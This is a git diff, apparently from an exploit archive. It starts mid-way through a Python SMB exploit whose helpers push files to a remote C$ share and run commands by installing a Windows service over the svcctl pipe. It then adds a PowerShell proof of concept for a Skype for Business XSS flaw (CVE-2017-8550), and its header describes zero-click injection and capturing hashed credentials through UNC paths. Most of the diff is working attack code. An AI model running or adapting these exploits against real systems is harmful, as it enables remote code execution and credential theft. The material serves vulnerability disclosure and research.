c:\pwned_exec.txt') + #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') + #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + +def smb_send_file(smbConn, localSrc, remoteDrive, remotePath): + with open(localSrc, 'rb') as fp: + smbConn.putFile(remoteDrive + '$', remotePath, fp.read) # based on impacket/examples/serviceinstall.py -def service_exec(smbConn, cmd): +def service_exec(conn, cmd): import random import string from impacket.dcerpc.v5 import transport, srvs, scmr @@ -477,13 +482,12 @@ def service_exec(smbConn, cmd): service_name = ''.join([random.choice(string.letters) for i in range(4)]) # Setup up a DCE SMBTransport with the connection already in place - rpctransport = transport.SMBTransport(smbConn.getRemoteHost(), smbConn.getRemoteHost(), filename=r'\svcctl', smb_connection=smbConn) - rpcsvc = rpctransport.get_dce_rpc() + rpcsvc = conn.get_dce_rpc('svcctl') rpcsvc.connect() rpcsvc.bind(scmr.MSRPC_UUID_SCMR) svnHandle = None try: - print("Opening SVCManager on %s....." % smbConn.getRemoteHost()) + print("Opening SVCManager on %s....." % conn.get_remote_host()) resp = scmr.hROpenSCManagerW(rpcsvc) svcHandle = resp['lpScHandle'] @@ -518,7 +522,7 @@ def service_exec(smbConn, cmd): scmr.hRDeleteService(rpcsvc, serviceHandle) scmr.hRCloseServiceHandle(rpcsvc, serviceHandle) except Exception, e: - print("ServiceExec Error on: %s" % smbConn.getRemoteHost()) + print("ServiceExec Error on: %s" % conn.get_remote_host()) print(str(e)) finally: if svcHandle: diff --git a/platforms/windows/remote/42316.ps1 b/platforms/windows/remote/42316.ps1 new file mode 100755 index 000000000..30460e75c --- /dev/null +++ b/platforms/windows/remote/42316.ps1 @@ -0,0 +1,101 @@ +# Exploit Title: Skype for Business 2016 XSS Injection - CVE-2017-8550 +# +# Exploit Author: @nyxgeek - TrustedSec +# Date: 2017-04-10 +# Vendor Homepage: www.microsoft.com +# Versions: 16.0.7830.1018 32-bit & 16.0.7927.1020 64-bit or lower +# +# +# Requirements: Originating machine needs Lync 2013 SDK installed as well as a user logged +# into the Skype for Business client locally +# +# +# Description: +# +# XSS injection is possible via the Lync 2013 SDK and PowerShell. No user-interaction is +# required for the XSS to execute on the target machine. It will run regardless of whether +# or not they accept the message. The target only needs to be online. +# +# Additionally, by forcing a browse to a UNC path via the file URI it is possible to +# capture hashed user credentials for the current user. +# Example: +# +# +# +# Shoutout to @kfosaaen for providing the base PowerShell code that I recycled +# +# +# Timeline of Disclosure +# ---------------------- +# 4/24/2017 Submitted to Microsoft +# 5/09/2017 Received confirmation that they were able to reproduce +# 6/14/2017 Fixed by Microsoft + + + + +#target user +$target = "username@domain.com" + +# For this example we will force the user to navigate to a page of our choosing (autopwn?) +# Skype uses the default browser for this. + +$message = "PoC Skype for Business 2016 XSS Injection" + + + + +if (-not (Get-Module -Name Microsoft.Lync.Model)) +{ + try + { + # you may need to change the location of this DLL + Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop + } + catch + { + Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824" + } +} + + # Connect to the local Skype process + try + { + $client = [Microsoft.Lync.Model.LyncClient]::GetClient() + } + catch + { + Write-Host "`nMust be signed-in to Skype" + break + } + + #Start Conversation + $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]" + + #Add the Message + $msg.Add(1,$message) + + # Add the contact URI + try + { + $contact = $client.ContactManager.GetContactByUri($target) + } + catch + { + Write-Host "`nFailed to lookup Contact"$target + break + } + + + # Create a conversation + $convo = $client.ConversationManager.AddConversation() + $convo.AddParticipant($contact) | Out-Null + + # Set the message mode as IM + $imModality = $convo.Modalities[1] + # Send the message + $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null + # End the Convo to suppress the UI + $convo.End() | Out-Null + + Write-Host "Sent the following message to "$target":`n"$message \ No newline at end of file